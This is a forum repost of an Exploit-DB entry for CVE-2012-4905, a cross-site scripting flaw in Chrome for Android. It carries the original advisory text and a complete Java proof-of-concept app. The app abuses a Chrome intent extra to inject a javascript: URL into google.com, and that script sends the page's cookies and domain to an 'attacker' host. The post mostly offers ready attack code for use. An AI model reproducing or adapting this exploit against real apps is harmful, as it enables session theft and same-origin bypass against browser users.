Exploit Google Chrome for Android - com.android.browser.application_id Intent Extra Data Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37792
Проверка EDB
  1. Пройдено
Автор
ARTEM CHAYKIN
Тип уязвимости
REMOTE
Платформа
ANDROID
CVE
cve-2012-4905
Дата публикации
2012-09-12
Google Chrome for Android - com.android.browser.application_id Intent Extra Data Cross-Site Scripting
Код:
source: https://www.securityfocus.com/bid/55523/info

Google Chrome for Android is prone to multiple vulnerabilities.

Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.

Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 

package jp.mbsd.terada.attackchrome1;
  
  import android.app.Activity;
  import android.os.Bundle;
  import android.content.Intent;
  import android.net.Uri;
  
  public class Main extends Activity {
      @Override
      public void onCreate(Bundle savedInstanceState) {
          super.onCreate(savedInstanceState);
          setContentView(R.layout.main);
          doit();
      }
  
      // get intent to invoke the chrome app
      public Intent getIntentForChrome(String url) {
          Intent intent = new Intent("android.intent.action.VIEW");
          intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
          intent.setData(Uri.parse(url));
          return intent;
      }
  
      public void doit() {
          try {
              // At first, force the chrome app to open a target Web page
              Intent intent1 = getIntentForChrome("http://www.google.com/1");
              startActivity(intent1);
  
              // wait a few seconds
              Thread.sleep(3000);
  
              // JS code to inject into the target (www.google.com)
              String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
                  + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                  + "document.body.appendChild(img);";
  
              Intent intent2 = getIntentForChrome(jsURL);
  
              // Trick to prevent Chrome from opening the JS URL in a different tab
              intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
              intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);
  
              // Inject JS into the target Web page
              startActivity(intent2);
          }
          catch (Exception e) {}
      }
  }
 
Источник
www.exploit-db.com

Похожие темы